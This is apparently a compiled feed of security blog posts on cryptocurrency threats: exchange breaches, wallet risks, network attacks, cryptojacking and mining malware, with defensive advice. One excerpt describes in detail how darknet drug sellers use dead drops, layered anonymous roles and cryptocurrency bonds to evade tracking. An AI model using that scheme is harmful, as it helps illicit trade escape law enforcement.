Hardware wallets are typically a small peripheral device (such as USB drives) used to generate and store keys, as well as verify and sign transactions. The device signs the transactions internally and only transmits the signed transactions to the network when connected to a networked computer. It is this separation of the private keys from the vulnerable online environment that allows a user to transact on the blockchain with reduced risk.

However, hardware wallets are susceptible to exploitation as well, such as man-in-the-middle (MitM) supply chain attacks, wherein a compromised device is purchased. Such an event obstenibly occurred in early 2018, when an individual purchased a compromised Nano Ledger off of eBay, and consequently lost $34,000 USD worth of cryptocurrency stored on the device as the attacker created their own recovery seed to later retrieve the funds stored on the device. In order to trick the victim, the attacker included a fake recovery seed form inside the compromised device packaging (as seen in Figure 2).


Figure 2: Fraudulent recovery seed document for Ledger Nano (image source: Reddit)

To help mitigate the risk of such an attack, FireEye recommends only purchasing a hardware wallet from the manufacturer directly or through authorized resellers.

In addition to supply-chain attacks, security researchers with Wallet.fail have recently disclosed two vulnerabilities in the Ledger Nano S device. One of these vulnerabilities allows an attacker to execute arbitrary code from the boot menu, and the other allows physical manipulation without the user knowing due to a lack of tamper evidence. In both cases, physical access to the device is required, and thus deemed less likely to occur if proper physical security of the device is maintained and unauthorized third-party purchasing is avoided.

Paper Wallets

Typically, wallet software solutions hide the process of generating, using, and storing private keys from the user. However, a paper wallet involves using an open-source wallet generator like BitAddress[.]org and WalletGenerator[.]net to generate the user’s public and private keys. Those keys are then printed to a piece of paper. While many view this form of key management as more secure because the keys do not reside on a digital device, there are still risks.

Because the private key is printed on paper, theft, loss, and physical damage present the highest risk to the user. Paper wallets are one of the only forms of key management that outwardly display the private key in such a way and should be used with extreme caution. It is also known that many printers keep a cache of printed content, so the possibility of extracting printed keys from exploited printers should also be considered.

Exchanges & Key Custodians

According to recent Cambridge University research, in 2013 there were approximately 300,000 to 1.3 million users of cryptocurrency. By 2017 there were between 2.9 million and 5.8 million users. To facilitate this expedited user growth, a multitude of companies have materialized that offer services enabling user interaction with the various cryptocurrency networks. A majority of these businesses function as an exchange and/or key custodians. Consequently, this can make the organization an ideal candidate for intrusion activity, whether it be spear phishing, distributed denial of service (DDoS) attacks, ransomware, or extortion threats (from both internal and external sources).

Many cryptocurrency exchanges and services around the world have reportedly suffered breaches and thefts in recent years that resulted in substantial financial losses and, in many cases, closures (Figure 3). One 2013 study found that out of 40 bitcoin exchanges analyzed, over 22 percent had experienced security breaches, forcing 56 percent of affected exchanges to go out of business.


Figure 3: Timeline of publicly reported cryptocurrency service compromises

Some of the more notable cryptocurrency exchange attacks that have been observed are as follows:

Time Frame

Entity

Description

July 2018

Bancor

Bancor admitted that unidentified actors compromised a wallet that was used to upgrade smart contracts. The actors purportedly withdrew 24,984 ETH tokens ($12.5 million USD) and 229,356,645 NPXS (Pundi X) tokens (approximately $1 million USD). The hackers also stole 3,200,000 of Bancor's own BNT tokens (approximately $10 million USD). Bancor did not comment on the details of the compromise or security measures it planned to introduce.

June 2018

Bithumb

Attackers stole cryptocurrencies worth $30 million USD from South Korea's largest cryptocurrency exchange, Bithumb. According to Cointelegraph Japan, the attackers hijacked Bithumb's hot (online) wallet.

June 2018

Coinrail

Coinrail admitted there was a "cyber intrusion" in its system and an estimated 40 billion won ($37.2 million USD) worth of coins were stolen. Police are investigating the breach, but no further details were released.

February 2018

BitGrail

BitGrail claimed $195 million USD worth of customers' cryptocurrency in Nano (XRB) was stolen.

January 2018

Coincheck

Unidentified attackers stole 523 million NEM coins (approximately $534 million USD) from the exchange's hot wallet. Coincheck stated that NEM coins were kept on a single-signature hot wallet rather than a more secure multi-signature wallet and confirmed that stolen coins belonged to Coincheck customers.

July 2017

Coindash

Unidentified actors reportedly stole $7.4 million USD from users attempting to invest during a Coindash (app platform) ICO. Coindash, which offers a trading platform for ether, launched its ICO by posting an Ethereum address to which potential investors could send funds. However, malicious actors compromised the website and replaced the legitimate address with their own ether wallet address. Coindash realized the manipulation and warned users only three minutes after the ICO began, but multiple individuals had already sent funds to the wrong wallet. This incident was the first known compromise of an ICO, which indicates the persistent creativity of malicious actors in targeting cryptocurrencies.

June 2017

Bithumb

Bithumb, a large exchange for ether and bitcoin, admitted that malicious actors stole a user database from a computer of an employee that allegedly includes the names, email addresses, and phone numbers of more than 31,800 customers. Bithumb stated that its internal network was not compromised. Bithumb suggested that actors behind this compromise used the stolen data to conduct phishing operations against the exchange's users in an attempt to steal currency from its wallets, allegedly stealing cryptocurrency worth more than $1 million USD.

April 2017

Yapizon

Unidentified actor(s) reportedly compromised four hot wallets belonging to a South Korean Bitcoin exchange, Yapizon, and stole more than 3,816 bitcoins (approximately $5 million USD). The identity of the responsible actor(s) and the method used to access the wallets remain unknown. However, Yapizon stated that there was no insider involvement in this incident.

August 2016

Bitfinex

Malicious actor(s) stole almost 120,000 bitcoins ($72 million USD at the time), from clients' accounts at Bitfinex, an exchange platform in Hong Kong. How the breach occurred remains unknown, but the exchange made some changes to its systems after regulatory scrutiny. However, some speculate that complying with the regulators' recommendations made Bitfinex vulnerable to theft.

May 2016

Gatecoin

The Hong Kong-based Gatecoin announced that as much as $2 million USD in ether and bitcoin were lost following an attack that occurred over multiple days. The company claimed that a malicious actor altered its system so ether deposit transfers went directly to the attacker's wallet during the breach.

February 2015

KipCoin

The Chinese exchange KipCoin announced that an attacker gained access to its server in 2014 and downloaded the wallet.dat file. The malicious actor stole more than 3,000 bitcoins months later.

February 2015

BTER

BTER announced via its website that it lost 7,170 bitcoins, ($1.75 million USD at the time). The company claimed that the bitcoins were stolen from its cold wallet.

December 2015

Bitstamp

Bitstamp reported that multiple operational wallets were compromised, which resulted in the loss of 19,000 bitcoins. The company received multiple phishing attempts in the months prior to the theft. One employee allegedly downloaded a malicious file that gave the attacker access to servers that contained the wallet.dat file and passphrase for the company's hot wallet.

August 2014

BTER

The China-based exchange BTER claimed that an attacker stole 50 million NXT, ($1.65 million USD at the time). The company claims the theft was possible following an attack on one of its hosting servers. The company reportedly negotiated the return of 85 percent of the stolen funds from the attacker.

July 2014

MintPal

MintPal admitted that an attacker accessed 8 million VeriCoins ($1.8 million USD) in the company's hot wallet. The attackers exploited a vulnerability in its withdrawal system that allowed them to bypass security controls to withdraw the funds.

Early 2014

Mt. Gox

Mt. Gox, one of the largest cryptocurrency exchanges, filed for bankruptcy following a theft of 850,000 bitcoins (approximately $450 million USD at the time) and more than $24 million USD from its bank accounts. A bug in the exchange's system that went unidentified for years allegedly enabled this compromise. Additionally, some speculated that an insider could have conducted the theft. Notably, recent reports revolving around the arrest of the founder of BTC-e (Alexander Vinnik) suggest he was responsible for the attack on Mt. Gox.

Table 2: Sample of observed exchange breaches

As little oversight is established for cryptocurrency exchanges and no widely accepted security standards exist for them, such incidents will likely persist. Notably, while these incidents may involve outsiders compromising exchanges' and services' systems, many of the high-profile compromises have also sparked speculations that insiders have been involved.

Software Bugs

While there has yet to be an in-the-wild attack that has caused significant harm to the Bitcoin network itself, remember the Bitcoin software is just that: software. Developers have identified 30 common vulnerabilities and exposures (CVEs) since at least 2010, many of which could have caused denial of service attacks on the network, exposure of user information, degradation of transaction integrity, or theft of funds.

The most recent software bug was a transaction validation bug that affected the consensus rules; essentially allowing miners to create transactions that weren’t properly validated and contained an extra input – which could have ultimately been exploited to create an amount of bitcoin from nothing. This vulnerability went unnoticed for two years, and fortunately was responsibly disclosed.

Running any peer-to-peer (P2P) or decentralized and distributed software is risky because each individual user has the responsibility to upgrade software when bugs are found. The more people who fail to update their software in a timely manner, the greater the chance of those nodes being exploited or used to attack the network.

Scaling & Attack Surface

At the time of this post, scaling blockchain networks to the size required to support a truly global payment system still presents a problem for the new technology and is an area of contention among developers and industry players. To address this, many developers are working on various scaling solutions. The following are some of the proposed solutions and the risks associated with each:

On-chain Scaling

One proposed suggestion is to increase the block size, which consequently shifts the cost of scaling to miners and those who operate nodes. Some argue that this could introduce the risk of centralization, because the only larger organizations that can meet the bandwidth and storage demands of ever-increasing block sizes can support this type of solution.

Off-chain Scaling

Some of the more popular blockchain scaling solutions for crypto-assets often depend on layering networks and system architectures on top of the base protocol – also referred to as “layer two” (L2) scaling. This allows users to conduct transactions “off-chain” and only occasionally synchronize them with the Bitcoin blockchain. Many argue that this is similar to how legal contracts are enforced; you don’t need to go to court each time a legal contract is written, agreed upon, and executed. And this is something that already occurs frequently in Bitcoin, as the vast majority of transactions happen offline and off-chain within large exchanges’ and merchant providers’ cold storage solutions.

However, two choices for off-chain scaling exist:

Off-chain Private Databases

This solution involves pushing transactions off-chain to a privately managed database where transaction can be settled and then occasionally synced with the Bitcoin blockchain. However, in creating this second layer of private “off-chain” transaction processing, an element of trust is introduced to the system, which unfortunately introduces risk. When transactions occur “off-chain” in a centralized private database, there is risk of improperly secured centralized ledgers that can be falsified or targeted for attack.

Off-chain Trustless Payment Channels

Another L2 solution would be to push transactions off-chain – not onto a private database, but to a trustless decentralized routing network. There are two primary L2 solutions being developed: The Liquid Network (for Bitcoin) and Raiden (for Ethereum).

However, a critique of this type of scaling solution is that the accounts used on this layer are considered hot wallets, which presents the largest attack surface. This makes it the riskiest way to store funds while also creating a valuable target for hackers. If an attacker is able to identify and access a user’s L2 node and associated wallet, they could transmit all funds out of the user’s wallet.

Lightning and Raiden as scaling solutions are still relatively new and experimental, so it’s unknown whether the they will be globally accepted as the preferred industry scaling solution. Additionally, because this layered development is still new and not widely implemented, at the time of this post there has not yet been an instance or proof of concept attack against L2 networks.

Network & Protocol Attacks

Actors may also attempt to directly exploit a cryptocurrency P2P network or cryptographic protocol to either steal cryptocurrency or disrupt a cryptocurrency network. Albeit rare, successful attacks of this nature have been observed. Examples of attack vectors that fall into this category include the following:

51% Attack

The 51% attack refers to the concept that if a single malicious actor or cohesive group of miners controlled more than 50 percent of the computing capability validating a cryptocurrency's transactions, they could reverse their own transactions or prevent transactions from being validated. While previously considered theoretical, 51% attacks have been recently observed:

  • In early April 2018, the cryptocurrency Verge reportedly suffered a 51% attack, which resulted in the attacker being able to mine 1,560 Verge coins (XVG) every second for a duration of three hours.
  • In May 2018, developers notified various cryptocurrency exchanges of a 51% attack on Bitcoin Gold. According to a report by Bitcoinist, the attack cost exchanges nearly $18 million.
  • Following the Bitcoin Gold attack, in June 2018, ZenCash became another target of the 51% attack, in which attackers siphoned $550,000 USD worth of currency from exchanges.

Companies such as NiceHash offer a marketplace for cryptocurrency cloud mining in which individuals can rent hashing power. Couple the information available from sites like Crypto51, which calculates the cost of performing 51% attacks, and it presents an attractive option for criminals seeking to disrupt cryptocurrency networks. While these types of attacks have been observed, and are no longer theoretical, they have historically posed the most risk to various alt-coins with lower network participation and hash rate. Larger, more robust, proof-of-work (PoW) networks are less likely to be affected, as the cost to perform the attack outweighs potential profit.

We anticipate that as long as the cost to perform the 51% attack and the likelihood of getting caught remains low, while the potential profit remains high, actors will continue showing interest in these types of attacks across less-robust cryptocurrency networks. 

Sybil Attack

A Sybil attack occurs when a single node claims to be multiple nodes on the P2P network, which many see as one of the greatest security risks among all large-scale, peer-to-peer networks. A notable Sybil attack (in conjunction with a traffic confirmation attack) against the Tor anonymity network occurred in 2014, spanned the course of five months, and was conducted by unknown actors.

As it pertains to cryptocurrency networks in particular, attackers performing this type of attack could perform the following:

  • Block honest users from the network by outnumber honest nodes on the network, and refusing to receive or transmit blocks.
  • Change the order of transactions, prevent them from being confirmed, or even reverse transactions that can lead to double spending by controlling a majority of the network computing power in large-scale attacks.

As described by Microsoft researcher John Douceur, many P2P networks rely on redundancy to help lower the dependence on potential hostile nodes and reduce the risk of such attacks. However, this method of mitigation falls short if an attacker impersonates a substantial fraction of the network nodes, rendering redundancy efforts moot. The suggested solution to avoiding Sybil attacks in P2P networks, as presented in the research, is to implement a logically centralized authority that can perform node identity/verification. According to the research, without implementing such a solution, Sybil attacks will always remain a threat “except under extreme and unrealistic assumptions of resource parity and coordination among entities.”

Eclipse Attack

An eclipse attack involves an attacker or group controlling a significant number of nodes and then using those nodes to monopolize inbound and outbound connections to other victim nodes, effectively obscuring the victim node’s view of the blockchain and isolating it from other legitimate peers on the network. According to security researchers, aside from disrupting the network and filtering the victim node’s view of the blockchain, eclipse attacks can be useful in launching additional attacks once successfully executed. Some of these attacks include:

  • Engineered Block Races: Block races occur in mining when two miners discover blocks at the same time. Generally, one block will be added to the chain, yielding mining rewards, while the other block is orphaned and ignored, yielding no mining reward. If an attacker can successfully eclipse attack miners, the attacker can engineer block races by hoarding blocks until a competing block has been found by non-eclipsed miners – effectively causing the eclipsed miners to waste efforts on orphaned blocks.
  • Splitting Mining Power: An attacker could use eclipse attacks to effectively cordon off fractions of miners on a network, thereby eliminating their hashing power from the network. Removing hashing power from a network allows for easier 51% attacks to occur given enough miners are effectively segmented from the network to make a 51% attack profitable.

On Jan. 5, 2019, the cryptocurrency company Coinbase detected a possible eclipse + 51% attack effecting the Ethereum Classic (ETC) blockchain. The attack involved malicious nodes surrounding Coinbase nodes, presenting them with several deep chain reorganizations and multiple double spends – totaling 219,500 ETC (worth at the time of this reporting roughly $1.1 million USD).

While eclipse attacks are difficult to mitigate across large-scale P2P networks, some fixes can make them more difficult to accomplish. FireEye recommends implementing the following, where applicable, to help reduce the risk of eclipse attacks:

  • Randomized node selection when establishing connections.
  • Retain information on other nodes previously deemed honest, and implement preferential connection to those nodes prior to randomized connections (this increases the likelihood of connecting to at least one honest node).

How the Public and Private Sector Can Help Mitigate Risk

Public Sector Priorities

As blockchain technology continues to develop, and issues like scaling, security, and identity management are addressed, it is safe to assume the ecosystem we have today will not look like the ecosystem of tomorrow. Due to this, the public sector has generally maintained a hands-off approach to allow the space to mature and innovate before implementing firm regulations. However, in the future, there are likely to be certain key areas of regulation the public sector could focus on:

  • Virtual Currencies (tax implications, asset classification)
  • Data encryption
  • Privacy
  • Identity Management (KYC and FCC)

Private Sector’s Role

Because of the public sector’s wait-and-see approach to regulation, it could be argued that the private sector should have a more active role in securing the technology as it continues to mature. Private sector leaders in software and network development, hardware manufacturing, and cyber security all have the ability to weigh in on blockchain development as it progresses to ensure user security and privacy are top priorities. Universities and independent research groups should continue to study this emerging technology as it develops.

While no widely promoted and formal security standards exist for cryptocurrency networks at the time of this post, The Cryptocurrency Certification Consortium (C4) is actively developing the Cryptocurrency Security Standard (CCSS), a set of requirements and framework to complement existing information security standards as it relates to cryptocurrencies, including exchanges, web applications, and cryptocurrency storage solutions.

Cyber Security Community

From a cyber security perspective, we should learn from the vulnerabilities of TCP/IP development in the early days of the internet, which focused more on usability and scale than security and privacy – and insist that if blockchain technology is to help revolutionize the way business and trade is conducted that those two areas of focus (security and privacy) are held at the forefront of blockchain innovation and adoption. This can be achieved through certain self-imposed (and universally agreed upon) industry standards, including:

  • Forced encryption of locally stored wallet files (instead of opt-in options).
  • Code or policy rule that requires new wallet and key generation when user performs password changes.
  • Continued development and security hardening of multi-sig wallet solutions.
  • Emphasis on and clear guidelines for responsible bug disclosure.
  • Continued security research and public reporting on security implications of both known and hypothetical vulnerabilities regarding blockchain development.
    • Analyzing protocols and implementations to determine what threats they face, and providing guidance on best practices.

Outlook

While blockchain technology offers the promise of enhanced security, it also presents its own challenges. Greater responsibility for security is often put into the hands of the individual user, and while some of the security challenges facing exchanges and online wallet providers can be addressed through existing best practices in cyber security, linking multiple users, software solutions, and integration into complex legacy financial systems creates several new cyber security paradigms.

To maintain strong network security, the roles and responsibilities of each type of participant in a blockchain network must be clearly defined and enforced, and the cyber security risks posed by each type of participant must be identified and managed. It is also critical that blockchain development teams understand the full range of potential threats that arise from interoperating with third parties and layering protocols and applications atop the base protocols.

The value and popularity of cryptocurrencies has grown significantly in the recent years, making these types of currencies a very attractive target for financially motivated actors. Many of the aforementioned examples of the various attack vectors can be of high utility in financially motivated operations. We expect cyber crime actors will continue to demonstrate high interest in targeting cryptocurrencies and their underlying network protocols for the foreseeable future.

The Evolution of Darknets

This is interesting:

To prevent the problems of customer binding, and losing business when darknet markets go down, merchants have begun to leave the specialized and centralized platforms and instead ventured to use widely accessible technology to build their own communications and operational back-ends.

Instead of using websites on the darknet, merchants are now operating invite-only channels on widely available mobile messaging systems like Telegram. This allows the merchant to control the reach of their communication better and be less vulnerable to system take-downs. To further stabilize the connection between merchant and customer, repeat customers are given unique messaging contacts that are independent of shared channels and thus even less likely to be found and taken down. Channels are often operated by automated bots that allow customers to inquire about offers and initiate the purchase, often even allowing a fully bot-driven experience without human intervention on the merchant's side.

[...]

The other major change is the use of "dead drops" instead of the postal system which has proven vulnerable to tracking and interception. Now, goods are hidden in publicly accessible places like parks and the location is given to the customer on purchase. The customer then goes to the location and picks up the goods. This means that delivery becomes asynchronous for the merchant, he can hide a lot of product in different locations for future, not yet known, purchases. For the client the time to delivery is significantly shorter than waiting for a letter or parcel shipped by traditional means - he has the product in his hands in a matter of hours instead of days. Furthermore this method does not require for the customer to give any personally identifiable information to the merchant, which in turn doesn't have to safeguard it anymore. Less data means less risk for everyone.

The use of dead drops also significantly reduces the risk of the merchant to be discovered by tracking within the postal system. He does not have to visit any easily to surveil post office or letter box, instead the whole public space becomes his hiding territory.

Cryptocurrencies are still the main means of payment, but due to the higher customer-binding, and vetting process by the merchant, escrows are seldom employed. Usually only multi-party transactions between customer and merchant are established, and often not even that.

[...]

Other than allowing much more secure and efficient business for both sides of the transaction, this has also lead to changes in the organizational structure of merchants:

Instead of the flat hierarchies witnessed with darknet markets, merchants today employ hierarchical structures again. These consist of procurement layer, sales layer, and distribution layer. The people constituting each layer usually do not know the identity of the higher layers nor are ever in personal contact with them. All interaction is digital -- messaging systems and cryptocurrencies again, product moves only through dead drops.

The procurement layer purchases product wholesale and smuggles it into the region. It is then sold for cryptocurrency to select people that operate the sales layer. After that transaction the risks of both procurement and sales layer are isolated.

The sales layer divides the product into smaller units and gives the location of those dead drops to the distribution layer. The distribution layer then divides the product again and places typical sales quantities into new dead drops. The location of these dead drops is communicated to the sales layer which then sells these locations to the customers through messaging systems.

To prevent theft by the distribution layer, the sales layer randomly tests dead drops by tasking different members of the distribution layer with picking up product from a dead drop and hiding it somewhere else, after verification of the contents. Usually each unit of product is tagged with a piece of paper containing a unique secret word which is used to prove to the sales layer that a dead drop was found. Members of the distribution layer have to post security - in the form of cryptocurrency - to the sales layer, and they lose part of that security with every dead drop that fails the testing, and with every dead drop they failed to test. So far, no reports of using violence to ensure performance of members of these structures has become known.

This concept of using messaging, cryptocurrency and dead drops even within the merchant structure allows for the members within each layer being completely isolated from each other, and not knowing anything about higher layers at all. There is no trace to follow if a distribution layer member is captured while servicing a dead drop. He will often not even be distinguishable from a regular customer. This makes these structures extremely secure against infiltration, takeover and capture. They are inherently resilient.

[...]

It is because of the use of dead drops and hierarchical structures that we call this kind of organization a Dropgang.

Your Guide to Stablecoins 2019

Stablecoins are cryptocurrencies with a value pegged to a currency or to exchange traded commodities. Many projects today are researching and developing such technology. Issuers distribute stablecoins to customers in exchange for fiat currency such as USD at a 1:1 fixed exchange rate. USD is a desirable medium of exchange and globally accepted unit of […]

The post Your Guide to Stablecoins 2019 appeared first on Hacked: Hacking Finance.

2018 Proved Highest Funding Year for Cybersecurity

Despite a 28% decrease in cybersecurity startups during 2017, global venture capital funding for cybersecurity rebounded with record high investments, according to Strategic Cyber Ventures. Though last year saw $5.3 billion

The post 2018 Proved Highest Funding Year for Cybersecurity appeared first on The Cyber Security Place.

Cryptopia cryptocurrency exchange hacked; suffers “significant losses”

By Waqas

Cryptopia, a New Zealand based cryptocurrency exchange has undercome a cyber attack leading to “significant losses.” The incident took place on January 14 and upon detecting the attack Cryptopia was forced to halt services by taking their website and exchange offline. Initially, on its Twitter account, Cryptopia claimed that the website has been taken down for “unscheduled maintenance” and displayed a […]

This is a post from HackRead.com Read the original post: Cryptopia cryptocurrency exchange hacked; suffers “significant losses”

Ethereum holders suspect Cryptopia exchange faked breach in exit scam

A cryptocurrency exchange in New Zealand is suspected of having performed an exit scam after bluntly announcing an immediate halt due to an alleged hack.

The first signs of trouble emerged on the afternoon of January 14, when Cryptopia announced on its Twitter page that the exchange was going through unscheduled maintenance.

“We are currently experiencing an unscheduled maintenance, we are working to resume services as soon as possible. We will keep you updated,” the exchange said.

The exchange later announced it was hacked, generating an immediate wave of speculation (mostly from its own customers) that it was, in fact, an exit scam. The fears wouldn’t be entirely unfounded, given the numerous precedents involving other exchanges and the lack of details about the situation. The full notice is here:

As reported by blockt.com, some users claim their Ethereum wallets were drained right before the shutdown.

Cryptopia has not disclosed the amount of digital currency stolen, nor if it will use its own funds (if any remain) to reimburse customers affected by the hack. We’ll update this story with any new developments.

BBC Email Scam Spoofs Broadcaster’s Site to Generate Bitcoin

Researchers identified a new email scam using seemingly legitimate BBC News webpages to reroute user clicks and generate bitcoin.

According to My Online Security, the spoofing attack emerged just after the holidays in the U.K. Malicious actors created what appeared to be legitimate emails containing a “Display Message” button, which in turn directed users to fake BBC webpages. Clicking anywhere on these scam pages rerouted users to an affiliate site that generated bitcoin for scammers based on page views.

It’s worth noting that the “Display Message” button doesn’t appear for Outlook users, and Mac users may find themselves redirected to fake login pages rather than spoofed BBC sites.

Not-So-Flattering Imitations

Spoofing is a common technique used by scammers to assuage user doubts and grab login credentials. Financial institutions are among the most popular targets in this kind of email scam. In some cases, spoofers misspell the names of legitimate websites (typosquatting), and in others they attach words to the original site address to keep the format but change the destination.

The BBC email scam opted for the second method, redirecting users to https://business-news.bbc-1.site/landers/bbc-business-news/#forward. The site looks legitimate at first glance, but upon further inspection, all articles and links relate to bitcoin, making money quickly or “invest now” finance opportunities.

As My Online Security points out, scammers are also sending messages from familiar contacts. In one case, a user received what appeared to be an expected invoice from a roofing company, but was instead the bitcoin redirect link. Further investigation revealed that the fake site was hosted by Cloudflare — once notified, the cloud provider set up an interstitial scam warning page to alert other users.

How to Defend Your Organization From Email Scams

The lucrative nature of click-driven spoofing means enterprises should expect more of the same in the foreseeable future. But it’s not all bad news: By employing physical safeguards such as verifying suspicious emails via a separate channel — phone calls, text messages or in person — organizations can lower their risk.

Security experts also suggest developing cyberattack frameworks that identify common attack vectors and deploy relevant countermeasures. For example, if spoofing emails are on the rise, a layered approach to email security can help weed out potential fakes. In addition, experts recommend regular re-evaluation of basic cybersecurity hygiene such as deleting redundant accounts, backing up critical data and application whitelisting — to reduce the chance of becoming a victim of an email scam.

The post BBC Email Scam Spoofs Broadcaster’s Site to Generate Bitcoin appeared first on Security Intelligence.

The Pirate Bay malware can empty your Cryptocurrency wallet

By Waqas

The malware was found hidden in the Windows shortcut file on The Pirate Bay. A new malware has been identified in popular torrent forum The Pirate Bay. The malware is discovered in a shortcut file for a movie and it has the capability to manipulate web pages along with changing the addresses for Bitcoin and […]

This is a post from HackRead.com Read the original post: The Pirate Bay malware can empty your Cryptocurrency wallet

Cryptojacking Up 4,000% How You Can Block the Bad Guys

Cryptojacking RisingThink about it: In the course of your everyday activities — like grocery shopping or riding public transportation — the human body comes in contact with an infinite number of germs. In much the same way, as we go about our digital routines — like shopping, browsing, or watching videos — our devices can also pick up countless, undetectable malware or javascript that can infect our devices.

Which is why it’s possible that hackers may be using malware or script to siphon power from your computer — power they desperately need to fuel their cryptocurrency mining business.

What’s Cryptocurrency?

Whoa, let’s back up. What’s cryptocurrency and why would people rip off other people’s computer power to get it? Cryptocurrencies are virtual coins that have a real monetary value attached to them. Each crypto transaction is verified and added to the public ledger (also called a blockchain). The single public ledger can’t be changed without fulfilling certain conditions. These transactions are compiled by cryptocurrency miners who compete with one another by solving the complex mathematical equations attached to the exchange. Their reward for solving the equation is bitcoin, which in the crypto world can equal thousands of dollars.

Power Surge

Cryptojacking RisingHere’s the catch: To solve these complex equations and get to crypto gold, crypto miners need a lot more hardware power than the average user possesses. So, inserting malicious code into websites, apps, and ads — and hoping you click — allows malicious crypto miners to siphon power from other people’s computers without their consent.

While mining cryptocurrency can often be a harmless hobby when malware or site code is attached to drain unsuspecting users CPU power, it’s considered cryptojacking, and it’s becoming more common.

Are you feeling a bit vulnerable? You aren’t alone. According to the most recent McAfee Labs Threats Report, cryptojacking has grown more than 4,000% in the past year.

Have you been hit?

One sign that you’ve been affected is that your computer or smartphone may slow down or have more glitches than normal. Crypto mining code runs quietly in the background while you go about your everyday work or browsing and it can go undetected for a long time.

How to prevent cryptojacking

Be proactive. Your first line of defense against a malware attack is to use a comprehensive security solution on your family computers and to keep that software updated.

Cryptojacking Blocker. This new McAfee product zeroes in on the cryptojacking threat and helps prevent websites from mining for cryptocurrency (see graphic below). Cryptojacking Blocker is included in all McAfee suites that include McAfee WebAdvisor. Users can update their existing WebAdvisor software to get Cryptojacking Blocker or download WebAdvisor for free.

Cryptojacking Rising

Discuss it with your family. Cryptojacking is a wild concept to explain or discuss at the dinner table, but kids need to fully understand the digital landscape and their responsibility in it. Discuss their role in helping to keep the family safe online and the motives of the bad guys who are always lurking in the background.

Smart clicks. One way illicit crypto miners get to your PC is through malicious links sent in legitimate-looking emails. Be aware of this scam (and many others) and think before you click on any links sent via email.

Stick with the legit. If a website, an app, or pop-up looks suspicious, it could contain malware or javascript that instantly starts working (mining power) when you load a compromised web page. Stick with reputable sites and apps and be extra cautious with how you interact with pop-ups.

Install updates immediately. Be sure to keep all your system software up-to-date when alerted to do so. This will help close any security gaps that hackers can exploit.

Strong passwords. These little combinations are critical to your family’s digital safety and can’t be ignored. Create unique passwords for different accounts and be sure to change out those passwords periodically.

To stay on top of the latest consumer and security threats that could impact your family, be sure to listen to our podcast Hackable? And, like us on Facebook.

The post Cryptojacking Up 4,000% How You Can Block the Bad Guys appeared first on McAfee Blogs.

NRSMiner Crypto-Mining Malware Infects Asian Devices With the Help of EternalBlue Exploit

Security researchers report that the newest version of NRSMiner crypto-mining malware is causing problems for companies that haven’t patched the EternalBlue exploit.

Last year, the EternalBlue exploit (CVE-2017-0144) leveraged Server Message Block (SMB) 1.0 flaws to trigger remote code execution and spread the WannaCry ransomware. Now, security research firm F-Secure reports that threat actors are using this exploit to infect unpatched devices in Asia with NRSMiner. While several countries including Japan, China and Taiwan have all been targeted, the bulk of attacks — around 54 percent — have occurred in Vietnam.

According to F-Secure, the newest version of NRSMiner has the capability to leverage both existing infections to update its code on host machines and intranet-connected systems to spread infections to machines that haven’t been patched with Microsoft security update MS17-010.

Eternal Issues Facing Security Professionals

In addition to its crypto-mining activities, the latest version of NRSMiner is also capable of downloading new versions of itself and deleting old files and services to cover its tracks. Using the WUDHostUpgrade[xx].exe module, NRSMiner actively searchers for potential targets to infect. If it detects the current NRSMiner version, WUDHostUpgrade deletes itself. If it finds a potential host, the malware deletes multiple system files, extracts its own versions and then installs a service named snmpstorsrv.

Although this crypto-mining malware is currently confined to Asia, its recent uptick serves as a warning to businesses worldwide that haven’t patched their EternalBlue vulnerabilities. While WannaCry infections have largely evaporated, the EternalBlue exploit/DoublePulsar backdoor combination remains an extremely effective way to deploy advanced persistent threats (APTs).

How to Curtail Crypto-Mining Malware Threats

Avoiding NRSMiner starts with security patching: Enterprises must ensure their systems are updated with MS17-010. While this won’t eliminate pre-existing malware infections, it will ensure no new EternalBlue exploits can occur. As noted by security experts, meanwhile, a combination of proactive and continual network monitoring can help identify both emerging threats and infections already present on enterprise systems. Organizations should also develop a comprehensive security framework that includes two-factor authentication (2FA), identity and access management (IAM), web application firewalls and reliable patch management.

EternalBlue exploits continue to cause problems for unpatched systems. Avoid NRSMiner and other crypto-mining malware threats by closing critical gaps, implementing improved monitoring strategies and developing advanced security frameworks.

The post NRSMiner Crypto-Mining Malware Infects Asian Devices With the Help of EternalBlue Exploit appeared first on Security Intelligence.

As Cryptocurrency Crash Continues, Will Mining Threat Follow?

Post authored by Nick Biasini.

Executive Summary

As 2018 draws to a close, one technology has definitively left its mark on the year: cryptocurrencies. Digital currencies started the year out strong after a meteoric rise toward the end of 2017. Since then, it's safe to say that cryptocurrencies have had a massive impact globally, especially on the threat landscape. However, 2018 is ending on a sour note for these currencies, as they have been in steady decline, ending in a sudden drop resulting in losses in excess of 75 percent of their value from the highs of late 2017 and early 2018.

Malicious cryptocurrency mining was the new payload of choice for adversaries and recurring revenue, dislodging the lump-sum payouts of threats like ransomware atop the threat landscape.

But the sudden collapse of the market, after a gradual decline, raises the question about how the threat landscape would be impacted, if at all. Despite conventional wisdom, Cisco Talos hasn't seen a notable shift away from cryptocurrency mining. We have seen pockets of movement, but they have lived explicitly in the email space where both threat distribution and botnets play a crucial role. As 2018 proceeded, adversaries have shifted payloads in the email space away from cryptocurrency mining and toward more modular threats like Emotet and remote access trojans (RATs). Talos is also releasing another blog today outlining some of the campaigns we've seen recently from some well-known actors who have a history with cryptocurrency mining.

After reviewing the real-world impact and associated data, it appears that cryptocurrency mining is not slowing down, and if anything, could be slightly increasing in frequency for certain aspects of the landscape. As we move into 2019, it's likely that the payloads of choice will continue to diverge between different aspects of the threat landscape. Regardless, enterprises need to be prepared to deal with malicious or unauthorized cryptocurrency mining activities on their respective networks, because it's not going away — at least not yet.

Introduction

It's clear, as far as the threat landscape is concerned, 2018 was the year of malicious cryptocurrency mining. Cisco Talos first covered cryptocurrency mining in early 2018, and again at multiple points throughout the year, including a whitepaper discussing the threat and associated coverage. In these attacks, malicious actors inject malware into systems and steal their computing power to "mine" cryptocurrencies. If done on a large scale, this kind of attack could cost enterprises a great deal of energy and resources. And for a personal user, it could significantly slow down their computing power and speed.

At the time, it was clear that actors had started to push quickly into primarily Monero-based cryptocurrency mining as a payload of choice. Since then, we have witnessed one of the most significant shifts in the threat landscape in years — and perhaps ever. Adversaries have gone all in on the idea of the recurring revenue model of cryptocurrency mining instead of the lump-sum gamble that ransomware provided so effectively throughout 2016 and 2017. In ransomware attacks, attackers asked for infected users to pay them a sum of money in exchange for the return of their information. But with miners, the attackers see revenue on a daily basis from their activities.

